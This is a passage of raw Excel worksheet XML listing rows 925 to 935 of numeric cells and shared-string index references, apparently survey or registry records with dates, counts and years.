        <v>80000</v>
      </c>
      <c r="X925">
        <v>0</v>
      </c>
      <c r="Y925">
        <v>0</v>
      </c>
      <c r="Z925">
        <v>0</v>
      </c>
      <c r="AA925">
        <v>0</v>
      </c>
      <c r="AB925">
        <v>5000</v>
      </c>
      <c r="AC925">
        <v>10000</v>
      </c>
      <c r="AD925">
        <v>0</v>
      </c>
      <c r="AE925">
        <v>150000</v>
      </c>
      <c r="AF925" t="s">
        <v>7107</v>
      </c>
      <c r="AG925">
        <v>98654</v>
      </c>
      <c r="AH925">
        <v>33</v>
      </c>
      <c r="AJ925">
        <v>474</v>
      </c>
      <c r="AK925" t="s">
        <v>6705</v>
      </c>
      <c r="AL925" t="s">
        <v>7108</v>
      </c>
      <c r="AM925" t="s">
        <v>7109</v>
      </c>
      <c r="AN925" t="s">
        <v>55</v>
      </c>
      <c r="AO925">
        <v>2018</v>
      </c>
      <c r="AP925" t="s">
        <v>7110</v>
      </c>
      <c r="AQ925" t="s">
        <v>7111</v>
      </c>
      <c r="AR925" t="s">
        <v>6885</v>
      </c>
      <c r="AS925" t="s">
        <v>71</v>
      </c>
      <c r="AT925" t="s">
        <v>58</v>
      </c>
      <c r="AU925">
        <v>25</v>
      </c>
      <c r="AV925">
        <v>2</v>
      </c>
      <c r="AW925">
        <v>20</v>
      </c>
      <c r="AX925">
        <v>30</v>
      </c>
      <c r="AY925">
        <v>156</v>
      </c>
      <c r="AZ925">
        <v>40</v>
      </c>
      <c r="BA925" t="s">
        <v>17354</v>
      </c>
      <c r="BB925" t="s">
        <v>17396</v>
      </c>
      <c r="BC925" t="s">
        <v>9693</v>
      </c>
      <c r="BD925" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="926" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A926">
        <v>2839</v>
      </c>
      <c r="B926" t="s">
        <v>7112</v>
      </c>
      <c r="C926" t="s">
        <v>3692</v>
      </c>
      <c r="D926" t="s">
        <v>7113</v>
      </c>
      <c r="E926" t="s">
        <v>1206</v>
      </c>
      <c r="F926" t="s">
        <v>7114</v>
      </c>
      <c r="G926" s="1">
        <v>44046</v>
      </c>
      <c r="H926">
        <v>4372</v>
      </c>
      <c r="I926">
        <v>4372</v>
      </c>
      <c r="J926">
        <v>0</v>
      </c>
      <c r="K926">
        <v>0</v>
      </c>
      <c r="L926">
        <v>0</v>
      </c>
      <c r="M926">
        <v>0</v>
      </c>
      <c r="N926">
        <v>0</v>
      </c>
      <c r="O926">
        <v>0</v>
      </c>
      <c r="P926">
        <v>0</v>
      </c>
      <c r="Q926">
        <v>1</v>
      </c>
      <c r="R926">
        <v>1</v>
      </c>
      <c r="S926">
        <v>0</v>
      </c>
      <c r="T926">
        <v>1</v>
      </c>
      <c r="U926">
        <v>0</v>
      </c>
      <c r="V926">
        <v>0</v>
      </c>
      <c r="W926">
        <v>0</v>
      </c>
      <c r="X926">
        <v>0</v>
      </c>
      <c r="Y926">
        <v>0</v>
      </c>
      <c r="Z926">
        <v>0</v>
      </c>
      <c r="AA926">
        <v>0</v>
      </c>
      <c r="AB926">
        <v>100</v>
      </c>
      <c r="AC926">
        <v>200</v>
      </c>
      <c r="AD926">
        <v>0</v>
      </c>
      <c r="AE926">
        <v>10</v>
      </c>
      <c r="AF926" t="s">
        <v>7115</v>
      </c>
      <c r="AG926">
        <v>27573</v>
      </c>
      <c r="AH926">
        <v>3</v>
      </c>
      <c r="AJ926">
        <v>67</v>
      </c>
      <c r="AK926" t="s">
        <v>7116</v>
      </c>
      <c r="AL926" t="s">
        <v>7117</v>
      </c>
      <c r="AM926" t="s">
        <v>7118</v>
      </c>
      <c r="AN926" t="s">
        <v>68</v>
      </c>
      <c r="AO926">
        <v>2017</v>
      </c>
      <c r="AP926">
        <v>81329694948</v>
      </c>
      <c r="AQ926" t="s">
        <v>7119</v>
      </c>
      <c r="AR926" t="s">
        <v>7115</v>
      </c>
      <c r="AS926" t="s">
        <v>71</v>
      </c>
      <c r="AT926" t="s">
        <v>72</v>
      </c>
      <c r="AU926">
        <v>0</v>
      </c>
      <c r="AV926">
        <v>0</v>
      </c>
      <c r="AW926">
        <v>0</v>
      </c>
      <c r="AX926">
        <v>0</v>
      </c>
      <c r="AY926">
        <v>1</v>
      </c>
      <c r="AZ926">
        <v>3</v>
      </c>
      <c r="BA926" t="s">
        <v>17372</v>
      </c>
      <c r="BB926">
        <v>0</v>
      </c>
      <c r="BC926" t="s">
        <v>11335</v>
      </c>
      <c r="BD926">
        <v>0</v>
      </c>
    </row>
    <row r="927" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A927">
        <v>4776</v>
      </c>
      <c r="B927" t="s">
        <v>7120</v>
      </c>
      <c r="C927" t="s">
        <v>99</v>
      </c>
      <c r="D927" t="s">
        <v>7121</v>
      </c>
      <c r="E927" t="s">
        <v>7122</v>
      </c>
      <c r="F927" t="s">
        <v>7123</v>
      </c>
      <c r="G927" s="1">
        <v>44028</v>
      </c>
      <c r="H927">
        <v>4398</v>
      </c>
      <c r="I927">
        <v>4398</v>
      </c>
      <c r="J927">
        <v>1</v>
      </c>
      <c r="K927">
        <v>1</v>
      </c>
      <c r="L927">
        <v>0</v>
      </c>
      <c r="M927">
        <v>0</v>
      </c>
      <c r="N927">
        <v>0</v>
      </c>
      <c r="O927">
        <v>0</v>
      </c>
      <c r="P927">
        <v>0</v>
      </c>
      <c r="Q927">
        <v>2</v>
      </c>
      <c r="R927">
        <v>2</v>
      </c>
      <c r="S927">
        <v>0</v>
      </c>
      <c r="T927">
        <v>1</v>
      </c>
      <c r="U927">
        <v>576000</v>
      </c>
      <c r="V927">
        <v>12000</v>
      </c>
      <c r="W927">
        <v>0</v>
      </c>
      <c r="X927">
        <v>0</v>
      </c>
      <c r="Y927">
        <v>0</v>
      </c>
      <c r="Z927">
        <v>0</v>
      </c>
      <c r="AA927">
        <v>0</v>
      </c>
      <c r="AB927">
        <v>80</v>
      </c>
      <c r="AC927">
        <v>1200</v>
      </c>
      <c r="AD927">
        <v>0</v>
      </c>
      <c r="AE927">
        <v>3000</v>
      </c>
      <c r="AF927" t="s">
        <v>7124</v>
      </c>
      <c r="AG927">
        <v>14440</v>
      </c>
      <c r="AH927">
        <v>12</v>
      </c>
      <c r="AJ927">
        <v>160</v>
      </c>
      <c r="AK927" t="s">
        <v>114</v>
      </c>
      <c r="AL927" t="s">
        <v>114</v>
      </c>
      <c r="AM927" t="s">
        <v>7125</v>
      </c>
      <c r="AN927" t="s">
        <v>55</v>
      </c>
      <c r="AO927">
        <v>2012</v>
      </c>
      <c r="AP927">
        <v>2129263568</v>
      </c>
      <c r="AQ927" t="s">
        <v>7126</v>
      </c>
      <c r="AR927" t="s">
        <v>7127</v>
      </c>
      <c r="AU927">
        <v>48</v>
      </c>
      <c r="AV927">
        <v>0</v>
      </c>
      <c r="AW927">
        <v>20</v>
      </c>
      <c r="AX927">
        <v>20</v>
      </c>
      <c r="AY927">
        <v>8</v>
      </c>
      <c r="AZ927">
        <v>0</v>
      </c>
      <c r="BA927" t="s">
        <v>17399</v>
      </c>
      <c r="BB927" t="s">
        <v>14304</v>
      </c>
      <c r="BC927" t="s">
        <v>11212</v>
      </c>
      <c r="BD927">
        <v>0</v>
      </c>
    </row>
    <row r="928" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A928">
        <v>4773</v>
      </c>
      <c r="B928" t="s">
        <v>7128</v>
      </c>
      <c r="C928" t="s">
        <v>168</v>
      </c>
      <c r="D928" t="s">
        <v>7129</v>
      </c>
      <c r="E928" t="s">
        <v>7130</v>
      </c>
      <c r="F928" t="s">
        <v>7131</v>
      </c>
      <c r="G928" s="1">
        <v>44053</v>
      </c>
      <c r="H928">
        <v>4405</v>
      </c>
      <c r="I928">
        <v>4405</v>
      </c>
      <c r="J928">
        <v>0</v>
      </c>
      <c r="K928">
        <v>2</v>
      </c>
      <c r="L928">
        <v>0</v>
      </c>
      <c r="M928">
        <v>0</v>
      </c>
      <c r="N928">
        <v>0</v>
      </c>
      <c r="O928">
        <v>0</v>
      </c>
      <c r="P928">
        <v>0</v>
      </c>
      <c r="Q928">
        <v>0</v>
      </c>
      <c r="R928">
        <v>0</v>
      </c>
      <c r="S928">
        <v>0</v>
      </c>
      <c r="T928">
        <v>0</v>
      </c>
      <c r="U928">
        <v>0</v>
      </c>
      <c r="V928">
        <v>100000</v>
      </c>
      <c r="W928">
        <v>0</v>
      </c>
      <c r="X928">
        <v>0</v>
      </c>
      <c r="Y928">
        <v>0</v>
      </c>
      <c r="Z928">
        <v>0</v>
      </c>
      <c r="AA928">
        <v>0</v>
      </c>
      <c r="AB928">
        <v>0</v>
      </c>
      <c r="AC928">
        <v>0</v>
      </c>
      <c r="AD928">
        <v>0</v>
      </c>
      <c r="AE928">
        <v>0</v>
      </c>
      <c r="AF928" t="s">
        <v>7132</v>
      </c>
      <c r="AG928">
        <v>45282</v>
      </c>
      <c r="AH928">
        <v>13</v>
      </c>
      <c r="AJ928">
        <v>172</v>
      </c>
      <c r="AK928" t="s">
        <v>7133</v>
      </c>
      <c r="AL928" t="s">
        <v>7134</v>
      </c>
      <c r="AM928" t="s">
        <v>7135</v>
      </c>
      <c r="AN928" t="s">
        <v>68</v>
      </c>
      <c r="AO928">
        <v>2017</v>
      </c>
      <c r="AP928" t="s">
        <v>7136</v>
      </c>
      <c r="AQ928" t="s">
        <v>7137</v>
      </c>
      <c r="AR928" t="s">
        <v>7138</v>
      </c>
      <c r="AS928" t="s">
        <v>71</v>
      </c>
      <c r="AT928" t="s">
        <v>72</v>
      </c>
      <c r="AU928">
        <v>25</v>
      </c>
      <c r="AV928">
        <v>0</v>
      </c>
      <c r="AW928">
        <v>2</v>
      </c>
      <c r="AX928">
        <v>6</v>
      </c>
      <c r="AY928">
        <v>4</v>
      </c>
      <c r="AZ928">
        <v>1</v>
      </c>
      <c r="BA928" t="s">
        <v>17395</v>
      </c>
      <c r="BB928">
        <v>0</v>
      </c>
      <c r="BC928">
        <v>0</v>
      </c>
      <c r="BD928" t="s">
        <v>11207</v>
      </c>
    </row>
    <row r="929" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A929">
        <v>4771</v>
      </c>
      <c r="B929" t="s">
        <v>7139</v>
      </c>
      <c r="C929" t="s">
        <v>129</v>
      </c>
      <c r="D929" t="s">
        <v>7140</v>
      </c>
      <c r="E929" t="s">
        <v>944</v>
      </c>
      <c r="F929" t="s">
        <v>7141</v>
      </c>
      <c r="G929" s="1">
        <v>44102</v>
      </c>
      <c r="H929">
        <v>4429</v>
      </c>
      <c r="I929">
        <v>4429</v>
      </c>
      <c r="J929">
        <v>1</v>
      </c>
      <c r="K929">
        <v>1</v>
      </c>
      <c r="L929">
        <v>0</v>
      </c>
      <c r="M929">
        <v>0</v>
      </c>
      <c r="N929">
        <v>0</v>
      </c>
      <c r="O929">
        <v>0</v>
      </c>
      <c r="P929">
        <v>2</v>
      </c>
      <c r="Q929">
        <v>5</v>
      </c>
      <c r="R929">
        <v>4</v>
      </c>
      <c r="S929">
        <v>1</v>
      </c>
      <c r="T929">
        <v>1</v>
      </c>
      <c r="U929">
        <v>10000</v>
      </c>
      <c r="V929">
        <v>1</v>
      </c>
      <c r="W929">
        <v>0</v>
      </c>
      <c r="X929">
        <v>0</v>
      </c>
      <c r="Y929">
        <v>0</v>
      </c>
      <c r="Z929">
        <v>0</v>
      </c>
      <c r="AA929">
        <v>2000</v>
      </c>
      <c r="AB929">
        <v>1000</v>
      </c>
      <c r="AC929">
        <v>200</v>
      </c>
      <c r="AD929">
        <v>1</v>
      </c>
      <c r="AE929">
        <v>50000</v>
      </c>
      <c r="AF929" t="s">
        <v>7142</v>
      </c>
      <c r="AG929">
        <v>15134</v>
      </c>
      <c r="AH929">
        <v>11</v>
      </c>
      <c r="AJ929">
        <v>270</v>
      </c>
      <c r="AK929" t="s">
        <v>2899</v>
      </c>
      <c r="AL929" t="s">
        <v>7143</v>
      </c>
      <c r="AM929" t="s">
        <v>7144</v>
      </c>
      <c r="AN929" t="s">
        <v>55</v>
      </c>
      <c r="AO929">
        <v>1973</v>
      </c>
      <c r="AP929" t="s">
        <v>7145</v>
      </c>
      <c r="AQ929" t="s">
        <v>7146</v>
      </c>
      <c r="AR929" t="s">
        <v>7142</v>
      </c>
      <c r="AS929" t="s">
        <v>71</v>
      </c>
      <c r="AT929" t="s">
        <v>58</v>
      </c>
      <c r="AU929">
        <v>26</v>
      </c>
      <c r="AV929">
        <v>1</v>
      </c>
      <c r="AW929">
        <v>16</v>
      </c>
      <c r="AX929">
        <v>2</v>
      </c>
      <c r="AY929">
        <v>6</v>
      </c>
      <c r="AZ929">
        <v>3</v>
      </c>
      <c r="BA929" t="s">
        <v>17394</v>
      </c>
      <c r="BB929" t="s">
        <v>16024</v>
      </c>
      <c r="BC929" t="s">
        <v>11302</v>
      </c>
      <c r="BD929" t="s">
        <v>11234</v>
      </c>
    </row>
    <row r="930" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A930">
        <v>4775</v>
      </c>
      <c r="B930" t="s">
        <v>7147</v>
      </c>
      <c r="C930" t="s">
        <v>157</v>
      </c>
      <c r="D930" t="s">
        <v>7148</v>
      </c>
      <c r="E930" t="s">
        <v>142</v>
      </c>
      <c r="F930" t="s">
        <v>7149</v>
      </c>
      <c r="G930" s="1">
        <v>44116</v>
      </c>
      <c r="H930">
        <v>4452</v>
      </c>
      <c r="I930">
        <v>4452</v>
      </c>
      <c r="J930">
        <v>1</v>
      </c>
      <c r="K930">
        <v>0</v>
      </c>
      <c r="L930">
        <v>2</v>
      </c>
      <c r="M930">
        <v>0</v>
      </c>
      <c r="N930">
        <v>0</v>
      </c>
      <c r="O930">
        <v>0</v>
      </c>
      <c r="P930">
        <v>0</v>
      </c>
      <c r="Q930">
        <v>1</v>
      </c>
      <c r="R930">
        <v>4</v>
      </c>
      <c r="S930">
        <v>0</v>
      </c>
      <c r="T930">
        <v>1</v>
      </c>
      <c r="U930">
        <v>100000</v>
      </c>
      <c r="V930">
        <v>0</v>
      </c>
      <c r="W930">
        <v>8000</v>
      </c>
      <c r="X930">
        <v>0</v>
      </c>
      <c r="Y930">
        <v>0</v>
      </c>
      <c r="Z930">
        <v>0</v>
      </c>
      <c r="AA930">
        <v>0</v>
      </c>
      <c r="AB930">
        <v>50</v>
      </c>
      <c r="AC930">
        <v>160</v>
      </c>
      <c r="AD930">
        <v>0</v>
      </c>
      <c r="AE930">
        <v>4000</v>
      </c>
      <c r="AF930" t="s">
        <v>7150</v>
      </c>
      <c r="AG930">
        <v>61252</v>
      </c>
      <c r="AH930">
        <v>16</v>
      </c>
      <c r="AJ930">
        <v>242</v>
      </c>
      <c r="AK930" t="s">
        <v>706</v>
      </c>
      <c r="AL930" t="s">
        <v>7151</v>
      </c>
      <c r="AM930" t="s">
        <v>7152</v>
      </c>
      <c r="AN930" t="s">
        <v>55</v>
      </c>
      <c r="AO930">
        <v>2020</v>
      </c>
      <c r="AP930" t="s">
        <v>7153</v>
      </c>
      <c r="AQ930">
        <v>82244684458</v>
      </c>
      <c r="AR930" t="s">
        <v>7154</v>
      </c>
      <c r="AU930">
        <v>26</v>
      </c>
      <c r="AV930">
        <v>1</v>
      </c>
      <c r="AW930">
        <v>11</v>
      </c>
      <c r="AX930">
        <v>8</v>
      </c>
      <c r="AY930">
        <v>6</v>
      </c>
      <c r="AZ930">
        <v>4</v>
      </c>
      <c r="BA930" t="s">
        <v>17398</v>
      </c>
      <c r="BB930" t="s">
        <v>17406</v>
      </c>
      <c r="BC930" t="s">
        <v>11241</v>
      </c>
      <c r="BD930" t="s">
        <v>11242</v>
      </c>
    </row>
    <row r="931" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A931">
        <v>4787</v>
      </c>
      <c r="B931" t="s">
        <v>7155</v>
      </c>
      <c r="C931" t="s">
        <v>607</v>
      </c>
      <c r="D931" t="s">
        <v>7156</v>
      </c>
      <c r="E931" t="s">
        <v>142</v>
      </c>
      <c r="F931" t="s">
        <v>403</v>
      </c>
      <c r="G931" s="1">
        <v>44053</v>
      </c>
      <c r="H931">
        <v>4491</v>
      </c>
      <c r="I931">
        <v>4491</v>
      </c>
      <c r="J931">
        <v>1</v>
      </c>
      <c r="K931">
        <v>0</v>
      </c>
      <c r="L931">
        <v>1</v>
      </c>
      <c r="M931">
        <v>0</v>
      </c>
      <c r="N931">
        <v>0</v>
      </c>
      <c r="O931">
        <v>0</v>
      </c>
      <c r="P931">
        <v>0</v>
      </c>
      <c r="Q931">
        <v>1</v>
      </c>
      <c r="R931">
        <v>10</v>
      </c>
      <c r="S931">
        <v>0</v>
      </c>
      <c r="T931">
        <v>1</v>
      </c>
      <c r="U931">
        <v>50000</v>
      </c>
      <c r="V931">
        <v>0</v>
      </c>
      <c r="W931">
        <v>5000</v>
      </c>
      <c r="X931">
        <v>0</v>
      </c>
      <c r="Y931">
        <v>0</v>
      </c>
      <c r="Z931">
        <v>0</v>
      </c>
      <c r="AA931">
        <v>0</v>
      </c>
      <c r="AB931">
        <v>100</v>
      </c>
      <c r="AC931">
        <v>2000</v>
      </c>
      <c r="AD931">
        <v>0</v>
      </c>
      <c r="AE931">
        <v>20000</v>
      </c>
      <c r="AF931" t="s">
        <v>7157</v>
      </c>
      <c r="AG931">
        <v>77489</v>
      </c>
      <c r="AH931">
        <v>24</v>
      </c>
      <c r="AJ931">
        <v>369</v>
      </c>
      <c r="AK931" t="s">
        <v>7158</v>
      </c>
      <c r="AL931" t="s">
        <v>7159</v>
      </c>
      <c r="AM931" t="s">
        <v>7160</v>
      </c>
      <c r="AN931" t="s">
        <v>68</v>
      </c>
      <c r="AO931">
        <v>2017</v>
      </c>
      <c r="AP931">
        <v>82265756185</v>
      </c>
      <c r="AQ931" t="s">
        <v>7161</v>
      </c>
      <c r="AR931" t="s">
        <v>7162</v>
      </c>
      <c r="AS931" t="s">
        <v>71</v>
      </c>
      <c r="AT931" t="s">
        <v>72</v>
      </c>
      <c r="AU931">
        <v>26</v>
      </c>
      <c r="AV931">
        <v>2</v>
      </c>
      <c r="AW931">
        <v>0</v>
      </c>
      <c r="AX931">
        <v>5</v>
      </c>
      <c r="AY931">
        <v>5</v>
      </c>
      <c r="AZ931">
        <v>2</v>
      </c>
      <c r="BA931" t="s">
        <v>16891</v>
      </c>
      <c r="BB931">
        <v>0</v>
      </c>
      <c r="BC931" t="s">
        <v>11251</v>
      </c>
      <c r="BD931" t="s">
        <v>10662</v>
      </c>
    </row>
    <row r="932" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A932">
        <v>4782</v>
      </c>
      <c r="B932" t="s">
        <v>7163</v>
      </c>
      <c r="C932" t="s">
        <v>224</v>
      </c>
      <c r="D932" t="s">
        <v>7164</v>
      </c>
      <c r="E932" t="s">
        <v>7165</v>
      </c>
      <c r="F932" t="s">
        <v>7166</v>
      </c>
      <c r="G932" s="1">
        <v>44071</v>
      </c>
      <c r="H932">
        <v>4523</v>
      </c>
      <c r="I932">
        <v>4523</v>
      </c>
      <c r="J932">
        <v>0</v>
      </c>
      <c r="K932">
        <v>0</v>
      </c>
      <c r="L932">
        <v>0</v>
      </c>
      <c r="M932">
        <v>0</v>
      </c>
      <c r="N932">
        <v>0</v>
      </c>
      <c r="O932">
        <v>0</v>
      </c>
      <c r="P932">
        <v>0</v>
      </c>
      <c r="Q932">
        <v>1</v>
      </c>
      <c r="R932">
        <v>1</v>
      </c>
      <c r="S932">
        <v>0</v>
      </c>
      <c r="T932">
        <v>0</v>
      </c>
      <c r="U932">
        <v>0</v>
      </c>
      <c r="V932">
        <v>0</v>
      </c>
      <c r="W932">
        <v>0</v>
      </c>
      <c r="X932">
        <v>0</v>
      </c>
      <c r="Y932">
        <v>0</v>
      </c>
      <c r="Z932">
        <v>0</v>
      </c>
      <c r="AA932">
        <v>0</v>
      </c>
      <c r="AB932">
        <v>50</v>
      </c>
      <c r="AC932">
        <v>200</v>
      </c>
      <c r="AD932">
        <v>0</v>
      </c>
      <c r="AE932">
        <v>0</v>
      </c>
      <c r="AF932" t="s">
        <v>7167</v>
      </c>
      <c r="AG932">
        <v>55752</v>
      </c>
      <c r="AH932">
        <v>15</v>
      </c>
      <c r="AJ932">
        <v>224</v>
      </c>
      <c r="AK932" t="s">
        <v>2178</v>
      </c>
      <c r="AL932" t="s">
        <v>2179</v>
      </c>
      <c r="AM932" t="s">
        <v>7168</v>
      </c>
      <c r="AN932" t="s">
        <v>68</v>
      </c>
      <c r="AO932">
        <v>2014</v>
      </c>
      <c r="AP932">
        <v>81328437614</v>
      </c>
      <c r="AQ932" t="s">
        <v>7169</v>
      </c>
      <c r="AR932" t="s">
        <v>7167</v>
      </c>
      <c r="AS932" t="s">
        <v>71</v>
      </c>
      <c r="AT932" t="s">
        <v>72</v>
      </c>
      <c r="AU932">
        <v>6</v>
      </c>
      <c r="AV932">
        <v>1</v>
      </c>
      <c r="AW932">
        <v>0</v>
      </c>
      <c r="AX932">
        <v>0</v>
      </c>
      <c r="AY932">
        <v>2</v>
      </c>
      <c r="AZ932">
        <v>6</v>
      </c>
      <c r="BA932" t="s">
        <v>17229</v>
      </c>
      <c r="BB932" t="s">
        <v>16028</v>
      </c>
      <c r="BC932" t="s">
        <v>11357</v>
      </c>
      <c r="BD932">
        <v>0</v>
      </c>
    </row>
    <row r="933" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A933">
        <v>4788</v>
      </c>
      <c r="B933" t="s">
        <v>7170</v>
      </c>
      <c r="C933" t="s">
        <v>157</v>
      </c>
      <c r="D933" t="s">
        <v>7171</v>
      </c>
      <c r="E933" t="s">
        <v>274</v>
      </c>
      <c r="F933" t="s">
        <v>7172</v>
      </c>
      <c r="G933" s="1">
        <v>44039</v>
      </c>
      <c r="H933">
        <v>4537</v>
      </c>
      <c r="I933">
        <v>4537</v>
      </c>
      <c r="J933">
        <v>0</v>
      </c>
      <c r="K933">
        <v>0</v>
      </c>
      <c r="L933">
        <v>0</v>
      </c>
      <c r="M933">
        <v>0</v>
      </c>
      <c r="N933">
        <v>0</v>
      </c>
      <c r="O933">
        <v>0</v>
      </c>
      <c r="P933">
        <v>0</v>
      </c>
      <c r="Q933">
        <v>0</v>
      </c>
      <c r="R933">
        <v>0</v>
      </c>
      <c r="S933">
        <v>0</v>
      </c>
      <c r="T933">
        <v>1</v>
      </c>
      <c r="U933">
        <v>0</v>
      </c>
      <c r="V933">
        <v>0</v>
      </c>
      <c r="W933">
        <v>0</v>
      </c>
      <c r="X933">
        <v>0</v>
      </c>
      <c r="Y933">
        <v>0</v>
      </c>
      <c r="Z933">
        <v>0</v>
      </c>
      <c r="AA933">
        <v>0</v>
      </c>
      <c r="AB933">
        <v>0</v>
      </c>
      <c r="AC933">
        <v>0</v>
      </c>
      <c r="AD933">
        <v>0</v>
      </c>
      <c r="AE933">
        <v>500</v>
      </c>
      <c r="AF933" t="s">
        <v>7173</v>
      </c>
      <c r="AG933">
        <v>61151</v>
      </c>
      <c r="AH933">
        <v>16</v>
      </c>
      <c r="AJ933">
        <v>252</v>
      </c>
      <c r="AK933" t="s">
        <v>7174</v>
      </c>
      <c r="AL933" t="s">
        <v>7175</v>
      </c>
      <c r="AM933" t="s">
        <v>7176</v>
      </c>
      <c r="AN933" t="s">
        <v>68</v>
      </c>
      <c r="AO933">
        <v>2016</v>
      </c>
      <c r="AP933" t="s">
        <v>6913</v>
      </c>
      <c r="AQ933" t="s">
        <v>7177</v>
      </c>
      <c r="AR933" t="s">
        <v>7173</v>
      </c>
      <c r="AU933">
        <v>25</v>
      </c>
      <c r="AV933">
        <v>1</v>
      </c>
      <c r="AW933">
        <v>1</v>
      </c>
      <c r="AX933">
        <v>3</v>
      </c>
      <c r="AY933">
        <v>1</v>
      </c>
      <c r="AZ933">
        <v>1</v>
      </c>
      <c r="BA933" t="s">
        <v>17409</v>
      </c>
      <c r="BB933">
        <v>0</v>
      </c>
      <c r="BC933" t="s">
        <v>11283</v>
      </c>
      <c r="BD933">
        <v>0</v>
      </c>
    </row>
    <row r="934" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A934">
        <v>2818</v>
      </c>
      <c r="B934" t="s">
        <v>7178</v>
      </c>
      <c r="C934" t="s">
        <v>99</v>
      </c>
      <c r="D934" t="s">
        <v>7179</v>
      </c>
      <c r="E934" t="s">
        <v>142</v>
      </c>
      <c r="F934" t="s">
        <v>182</v>
      </c>
      <c r="G934" s="1">
        <v>44048</v>
      </c>
      <c r="H934">
        <v>4558</v>
      </c>
      <c r="I934">
        <v>4558</v>
      </c>
      <c r="J934">
        <v>1</v>
      </c>
      <c r="K934">
        <v>0</v>
      </c>
      <c r="L934">
        <v>1</v>
      </c>
      <c r="M934">
        <v>0</v>
      </c>
      <c r="N934">
        <v>0</v>
      </c>
      <c r="O934">
        <v>0</v>
      </c>
      <c r="P934">
        <v>0</v>
      </c>
      <c r="Q934">
        <v>0</v>
      </c>
      <c r="R934">
        <v>0</v>
      </c>
      <c r="S934">
        <v>0</v>
      </c>
      <c r="T934">
        <v>0</v>
      </c>
      <c r="U934">
        <v>500000</v>
      </c>
      <c r="V934">
        <v>0</v>
      </c>
      <c r="W934">
        <v>50000</v>
      </c>
      <c r="X934">
        <v>0</v>
      </c>
      <c r="Y934">
        <v>0</v>
      </c>
      <c r="Z934">
        <v>0</v>
      </c>
      <c r="AA934">
        <v>0</v>
      </c>
      <c r="AB934">
        <v>0</v>
      </c>
      <c r="AC934">
        <v>0</v>
      </c>
      <c r="AD934">
        <v>0</v>
      </c>
      <c r="AE934">
        <v>0</v>
      </c>
      <c r="AF934" t="s">
        <v>7180</v>
      </c>
      <c r="AG934">
        <v>14450</v>
      </c>
      <c r="AH934">
        <v>12</v>
      </c>
      <c r="AJ934">
        <v>160</v>
      </c>
      <c r="AK934" t="s">
        <v>114</v>
      </c>
      <c r="AL934" t="s">
        <v>115</v>
      </c>
      <c r="AM934" t="s">
        <v>7181</v>
      </c>
      <c r="AN934" t="s">
        <v>55</v>
      </c>
      <c r="AO934">
        <v>2016</v>
      </c>
      <c r="AP934" t="s">
        <v>7182</v>
      </c>
      <c r="AQ934">
        <v>8111897757</v>
      </c>
      <c r="AR934" t="s">
        <v>7180</v>
      </c>
      <c r="AS934" t="s">
        <v>71</v>
      </c>
      <c r="AT934" t="s">
        <v>58</v>
      </c>
      <c r="AU934">
        <v>24</v>
      </c>
      <c r="AV934">
        <v>0</v>
      </c>
      <c r="AW934">
        <v>0</v>
      </c>
      <c r="AX934">
        <v>0</v>
      </c>
      <c r="AY934">
        <v>10</v>
      </c>
      <c r="AZ934">
        <v>5</v>
      </c>
      <c r="BA934" t="s">
        <v>17353</v>
      </c>
      <c r="BB934">
        <v>0</v>
      </c>
      <c r="BC934" t="s">
        <v>9550</v>
      </c>
      <c r="BD934" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="935" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A935">
        <v>4798</v>
      </c>
      <c r="B935" t="s">
        <v>7183</v>
      </c>
      <c r="C935" t="s">
        <v>129</v>
      </c>
      <c r="D935" t="s">
        <v>7184</v>
      </c>
      <c r="E935" t="s">
        <v>111</v>
      </c>
      <c r="F935" t="s">
        <v>7185</v>
      </c>
      <c r="G935" s="1">
        <v>44034</v>
      </c>
      <c r="H935">
        <v>4566</v>
      </c>
      <c r="I935">
        <v>4566</v>
      </c>
      <c r="J935">
        <v>1</v>
      </c>
      <c r="K935">
        <v>0</v>
      </c>
      <c r="L935">
        <v>0</v>
      </c>
      <c r="M935">
        <v>0</v>
      </c>
      <c r="N935">
        <v>0</v>
      </c>
      <c r="O935">
        <v>0</v>
      </c>
      <c r="P935">
        <v>0</v>
      </c>
      <c r="Q935">
        <v>0</v>
      </c>
      <c r="R935">
        <v>0</v>
      </c>
      <c r="S935">
        <v>0</v>
      </c>
      <c r="T935">
        <v>0</v>
      </c>
      <c r="U935">
        <v>100000</v>
      </c>
      <c r="V935">
        <v>0</v>
      </c>
      <c r="W935">
        <v>0</v>
      </c>
      <c r="X935">
        <v>0</v>
      </c>
      <c r="Y935">
        <v>0</v>
      </c>
      <c r="Z935">
        <v>0</v>
      </c>
      <c r="AA935">
        <v>0</v>
      </c>
      <c r="AB935">
        <v>0</v>
      </c>
      <c r="AC935">
        <v>0</v>
      </c>
      <c r="AD935">
        <v>0</v>
      </c>
      <c r="AE935">
        <v>0</v>
      </c>
      <c r="AF935" t="s">
        <v>7186</v>
      </c>
      <c r="AG935">
        <v>15211</v>
      </c>
      <c r="AH935">
        <v>11</v>
      </c>
      <c r="AJ935">
        <v>268</v>
      </c>
      <c r="AK935" t="s">
        <v>252</v>
      </c>
      <c r="AL935" t="s">
        <v>174</v>
      </c>
      <c r="AM935" t="s">
        <v>7187</v>
      </c>
      <c r="AN935" t="s">
        <v>288</v>
      </c>
      <c r="AO935">
        <v>2003</v>
      </c>
      <c r="AP935" t="s">
        <v>7188</v>
      </c>
      <c r="AQ935" t="s">
        <v>7189</v>
      </c>
      <c r="AR935" t="s">
        <v>7186</v>
      </c>
      <c r="AU935">
        <v>25</v>
      </c>
      <c r="AV935">
        <v>1</v>
      </c>
      <c r="AW935">
        <v>7</v>
      </c>
      <c r="AX935">
        <v>0</v>
      </c>
      <c r="AY935">
        <v>3</v>
      </c>
      <c r="AZ935">
        <v>1</v>
      </c>
      <c r="BA935" t="s">
        <v>16694</v>
      </c>
      <c r="BB935" t="s">
        <v>14585</v>
      </c>
      <c r="BC935" t="s">
        <v>11316</v>
      </c>
      <c r="BD935" t="s">
        <v>11317</v>
      </c>
    </row>
    <row r="936" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A936">
        <v>4779</v>
      </c>
